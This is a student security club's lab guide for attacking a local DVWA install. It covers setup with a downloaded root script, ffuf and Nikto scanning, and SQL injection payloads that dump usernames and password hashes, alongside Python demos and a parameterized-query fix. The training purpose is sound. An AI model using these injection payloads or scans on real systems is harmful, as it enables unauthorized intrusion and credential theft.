
Web Penetration Lab Guide

Author: NTU LyonSec
Located at Nanyang Technological University, we are an information security interest group that enjoys competing in CTFs and organizing cybersecurity-themed sessions :)


1. Installation of DVWA

Installation Steps

  1. Ensure Network Access

    • In Kali Linux, confirm that the VM's network adapter is in NAT mode and that the VM has internet access (for example, open a website in the browser or run ping -c 3 kali.org). NAT also keeps the deliberately vulnerable DVWA instance reachable only from the VM and the host, not from other machines on your LAN, so do not switch the adapter to bridged mode for this lab. Use the following images as a guide:
      [Screenshots 1 and 2: VM network adapter settings showing NAT mode]
  2. Download the Installation Script

    • Open the terminal in your Kali VM and enter the following command to download the DVWA installation script:
      wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh
      
  3. Make the Script Executable

    • Change the permissions of the script to make it executable:
      chmod +x Install-DVWA.sh
      
  4. Run the Script

    • Run the installation script with elevated privileges. It is a third-party script that runs as root and installs packages and services, so read through it first (for example with less Install-DVWA.sh) so you know what it changes before you run it:
      sudo ./Install-DVWA.sh
      
  5. Follow Prompts

    • When prompted during the installation process, simply press Enter to accept the defaults.
  6. Need Help?

    [Screenshot 3]

  7. Verify Installation

    • Once installed, DVWA should be accessible at http://localhost/DVWA in your browser. If the login page reports that the database has not been set up, open http://localhost/DVWA/setup.php and click Create / Reset Database. Log in with DVWA's default credentials, admin / password, and leave the level at Low under DVWA Security in the left menu; the rest of this guide assumes that level.

2. Directory Enumeration with ffuf

Steps for Enumeration

  1. Install a Wordlist

    • Use a suitable wordlist for directory enumeration. The recommended source is SecLists, which Kali packages (the wordlists are installed under /usr/share/seclists):
      sudo apt -y install seclists
      
  2. Run ffuf

    • Use ffuf to search for directories. FUZZ marks where each wordlist entry is substituted; ffuf's default matcher keeps responses with status codes 200-299, 301, 302, 307, 401, 403, 405 and 500, so 404s are dropped automatically:

      ffuf -u http://localhost/DVWA/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
      

      Example output:

      [Screenshot 4: example ffuf output]

      This reveals files and subdirectories under localhost/DVWA that may contain exploitable resources. Because DVWA is written in PHP, also run the scan with -e .php so that each word is tried with a .php extension, and add -recursion to descend into the directories that are found. If every word comes back with the same status and size, the server is answering unknown paths with a "soft 404"; add -ac so that ffuf calibrates on a random path and filters those responses out.

  3. Review the Results in BurpSuite

    • To inspect the hits in a more organized way, replay them through BurpSuite. -replay-proxy sends only the matched requests through the proxy (127.0.0.1:8080 is Burp's default listener), so Burp's HTTP history contains the findings rather than the whole wordlist:
      ffuf -u http://localhost/DVWA/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -replay-proxy http://127.0.0.1:8080
      
  4. Launch BurpSuite

    • BurpSuite does not start by itself; it must be running with its proxy listener enabled before the replay command is run. To launch it:
      • Click the Kali Logo on the top left.
      • Search for and select BurpSuite.
      • Follow the prompts to create a new project (a temporary project is fine; it is the only kind the Community edition offers). Then confirm in the Proxy tab that a listener is active on 127.0.0.1:8080.

    [Screenshot 5: BurpSuite]
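To show what the ffuf run above actually does, here is an added example (not ffuf's code, and not part of the original guide): a minimal fuzzer in Python that substitutes each wordlist entry into base_url/FUZZ, applies a status-code matcher like ffuf's default, and calibrates on a random path to drop "soft 404" responses, which is what ffuf's -ac option does. It runs against a constructed in-process HTTP server standing in for the target; the paths, bodies and wordlist are made up for the example and are not a map of a real DVWA install.

```python
"""Minimal ffuf-style directory fuzzer with soft-404 calibration (added example)."""
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import ProxyHandler, build_opener

# Constructed fake target: a few resources that exist, plus a "soft 404" that
# answers 200 with a fixed page for everything else.
FAKE_SITE = {
    "/login.php": (200, b"<html>DVWA login form</html>"),
    "/setup.php": (200, b"<html>Database setup page</html>"),
    "/config": (403, b"<html>Forbidden</html>"),
    "/robots.txt": (200, b"User-agent: *\nDisallow: /"),
}
SOFT_404 = (200, b"<html>That page was not found (but the status is 200)</html>")

# Constructed mini wordlist; a real run would use SecLists' big.txt.
WORDLIST = ["admin", "login.php", "setup.php", "config", "images", "robots.txt", "backup"]

# ffuf's default matcher: 200-299, 301, 302, 307, 401, 403, 405, 500.
DEFAULT_MATCH = set(range(200, 300)) | {301, 302, 307, 401, 403, 405, 500}


class FakeTarget(BaseHTTPRequestHandler):
    """Serves FAKE_SITE and the soft 404 for anything else."""

    def do_GET(self):
        status, body = FAKE_SITE.get(self.path, SOFT_404)
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the example quiet


def start_fake_target():
    """Start the fake target on a random loopback port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakeTarget)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}"


# Direct connection, ignoring any http_proxy set in the environment.
_opener = build_opener(ProxyHandler({}))


def fetch(url):
    """Return (status, body_length); 4xx/5xx responses are results, not errors."""
    try:
        with _opener.open(url, timeout=5) as resp:
            return resp.status, len(resp.read())
    except HTTPError as err:
        return err.code, len(err.read())


def calibrate(base_url):
    """Fetch a random path that cannot exist and return its (status, length)
    signature, so responses that look exactly like it can be discarded."""
    return fetch(f"{base_url}/{secrets.token_hex(8)}")


def fuzz(base_url, wordlist, matcher=DEFAULT_MATCH):
    """Substitute each word for FUZZ in base_url/FUZZ and keep the hits."""
    soft404 = calibrate(base_url)
    hits = []
    for word in wordlist:
        status, length = fetch(f"{base_url}/{word}")
        if status in matcher and (status, length) != soft404:
            hits.append((word, status, length))
    return hits


if __name__ == "__main__":
    server, base = start_fake_target()
    for word, status, length in fuzz(base, WORDLIST):
        print(f"{word:<12} [Status: {status}, Size: {length}]")
    server.shutdown()
```

Without the calibration step, admin, images and backup would all be reported as 200 hits, which is exactly the noise you see when a target answers unknown paths with a custom "not found" page; comparing status and size against a known-bogus request removes them while keeping the 403 on config, which is still worth a look.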


3. Scanning with Nikto

Steps for Scanning

  1. Run Nikto

    • Use the following command to scan DVWA:
      nikto -host http://localhost/DVWA
      
  2. Analyze Results

    • Example output:

      [Screenshot 6: example Nikto output]

      Nikto reports server details (for example the Apache and PHP versions announced in the Server and X-Powered-By headers) and potential weaknesses such as missing security headers (e.g., X-Content-Type-Options, X-Frame-Options) or a session cookie set without the HttpOnly flag. These findings guide the next steps, but verify each one by hand before acting on it: Nikto is signature-based and reports false positives, and it sends thousands of requests, so it is noisy and easily logged.
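Nikto's header findings are easy to confirm by hand. The following added example (not Nikto's code, and not from the original guide) parses a raw HTTP response and reports the same class of issues: a missing or wrong X-Content-Type-Options, no anti-clickjacking header, version numbers leaked in Server or X-Powered-By, and a cookie set without HttpOnly. Both responses are constructed for the example: the first resembles a default Apache/PHP reply such as a fresh DVWA install returns, the second the same server after hardening. Real responses differ, so run the check on what you actually receive (for example the output of curl -i).

```python
"""Manual check for the header weaknesses a scanner such as Nikto reports (added example)."""

# Constructed responses; neither was captured from a real server.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache/2.4.57 (Debian)\r\n"
    "X-Powered-By: PHP/8.2.7\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly; SameSite=Lax\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Frame-Options: DENY\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)


def parse_headers(raw):
    """Split a raw response into (status_line, {lowercased-name: [values]}).
    Repeated headers such as Set-Cookie are kept as a list."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status_line, headers


def check_headers(raw):
    """Return a list of (severity, finding) tuples for the response."""
    _, h = parse_headers(raw)
    findings = []

    # Browsers only honour the exact value "nosniff".
    xcto = h.get("x-content-type-options", [""])[0].lower()
    if xcto != "nosniff":
        findings.append(("low", "X-Content-Type-Options header missing or not 'nosniff'"))

    # Either X-Frame-Options or a CSP frame-ancestors directive prevents framing.
    csp = " ".join(h.get("content-security-policy", [])).lower()
    if "x-frame-options" not in h and "frame-ancestors" not in csp:
        findings.append(("low", "no anti-clickjacking header (X-Frame-Options or CSP frame-ancestors)"))

    # Version strings help an attacker pick exploits; informational for the tester.
    for name in ("server", "x-powered-by"):
        for value in h.get(name, []):
            if any(ch.isdigit() for ch in value):
                findings.append(("info", f"{name} header reveals a version: {value}"))

    # A session cookie readable by JavaScript can be stolen through XSS.
    for cookie in h.get("set-cookie", []):
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(("low", f"cookie set without HttpOnly: {cookie.split('=', 1)[0]}"))

    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        results = check_headers(raw)
        print(f"== {label}: {len(results)} finding(s)")
        for severity, text in results:
            print(f"  [{severity}] {text}")
```

The weak response produces five findings and the hardened one none; the difference is a handful of Apache directives (Header set X-Content-Type-Options, Header set X-Frame-Options, ServerTokens Prod, session.cookie_httponly in php.ini), which is a useful thing to know when the same headers show up in a real report.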


4. Brute Forcing Web Login

For guidance on brute-forcing the DVWA login page using BurpSuite, refer to this article:
Hacking into DVWA Using BurpSuite Brute Force


5. SQL Injections

Steps for SQL Injection

  1. Navigate to the SQL Injection Page

    • In the DVWA menu on the left, open SQL Injection (http://localhost/DVWA/vulnerabilities/sqli/).
  2. Test with a Simple Input

    • Enter 1 into the User ID form and submit it. The page echoes the first and last name of the user whose user_id is 1, and the submitted value appears in the URL as the id parameter, which is where the payloads below are sent:

      [Screenshot 7: DVWA SQL Injection page with User ID 1 submitted]

  3. Inspect the Source Code

    • Click the View Source button at the bottom of the page to review the PHP that handles the input. At the Low level the relevant lines build the query by interpolating the raw parameter into the SQL string:
      $id = $_REQUEST['id'];
      $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
      
  4. Test a Basic Payload

    • Enter the following payload. The first quote closes the string literal around the id, OR '1'='1' makes the WHERE clause true for every row, and # starts a MySQL comment that swallows the original closing quote and semicolon:
      1' OR '1'='1' #
      
    • The executed query becomes SELECT first_name, last_name FROM users WHERE user_id = '1' OR '1'='1' #'; and, because the condition is always true, the page lists every user in the table instead of just one.
  5. Extract More Data

    • To learn the table's layout, use a UNION SELECT, which appends the rows of a second query to the first. It must return the same number of columns as the original query (two here, hence the NULL placeholder), and the comment at the end discards the rest of the original statement (use # or -- followed by a space; MySQL only treats -- as a comment when whitespace follows it). Querying MySQL's information_schema lists the columns of the users table:
      ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' #
      
  6. Retrieve User Data

    • Extract usernames and password hashes (DVWA stores MD5 hashes, which can then be cracked offline) with:
      ' UNION SELECT user, password FROM users #
      

Why It Works

  • The application takes $_REQUEST['id'] and interpolates it unchanged into the SQL string, so an input containing a quote changes the structure of the query instead of being treated as data. The fix is not better filtering of quotes but parameterized queries (prepared statements), in which the SQL text is fixed and the id is bound as a value; DVWA's Impossible level does exactly that.
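To make the mechanism concrete, here is an added example (not DVWA's code, and not from the original guide) that rebuilds the Low-level lookup in Python against an in-memory SQLite database with a constructed users table shaped like DVWA's, runs the guide's payloads through it, and then runs the same payloads through a parameterized version of the query. Two MySQL-to-SQLite differences are reflected in the payloads: SQLite has no # comment, so the -- form (with the trailing space MySQL also needs) is used, and it has no information_schema, so the column-discovery step reads the CREATE TABLE text from sqlite_master instead. The sample users and passwords are made up; the stored hashes are their real MD5 values.

```python
"""DVWA Low-level SQL injection reproduced on SQLite, beside the parameterized fix (added example)."""
import hashlib
import sqlite3


def make_db():
    """Constructed users table shaped like DVWA's; passwords stored as MD5, as DVWA does."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    sample = [(1, "admin", "admin", "admin", "password"),
              (2, "Gordon", "Brown", "gordonb", "abc123")]
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(uid, first, last, user, hashlib.md5(pw.encode()).hexdigest())
         for uid, first, last, user, pw in sample],
    )
    return db


def lookup_vulnerable(db, user_id):
    """Mirrors DVWA's Low level: the raw id is interpolated into the SQL text,
    so a quote in the input becomes part of the query's syntax."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}';"
    return db.execute(query).fetchall()


def lookup_safe(db, user_id):
    """Parameterized query: the SQL text is fixed and the id is bound as a value,
    so the same payloads are merely compared against user_id as strings."""
    return db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?;", (user_id,)
    ).fetchall()


# The guide's payloads, with '#' replaced by '-- ' for SQLite and information_schema
# replaced by sqlite_master (its sql column holds the CREATE TABLE statement).
PAYLOAD_TAUTOLOGY = "1' OR '1'='1' -- "
PAYLOAD_COLUMNS = "' UNION SELECT name, sql FROM sqlite_master -- "
PAYLOAD_DUMP = "' UNION SELECT user, password FROM users -- "


def run_demo():
    """Return what each payload yields against the vulnerable and the safe lookup."""
    db = make_db()
    return {
        "normal": lookup_vulnerable(db, "1"),
        "tautology": lookup_vulnerable(db, PAYLOAD_TAUTOLOGY),
        "columns": lookup_vulnerable(db, PAYLOAD_COLUMNS),
        "dump": sorted(lookup_vulnerable(db, PAYLOAD_DUMP)),
        "safe_tautology": lookup_safe(db, PAYLOAD_TAUTOLOGY),
        "safe_dump": lookup_safe(db, PAYLOAD_DUMP),
    }


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(f"{name}: {rows}")
```

Against the interpolated query the tautology returns both users, the sqlite_master UNION returns the table definition (the equivalent of the information_schema step), and the final UNION returns the username and hash columns in place of first and last name. Against the parameterized query every payload returns no rows, because the whole string is compared to user_id as a value and never parsed as SQL.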

Use this guide responsibly and only for ethical purposes, such as penetration testing in authorized environments.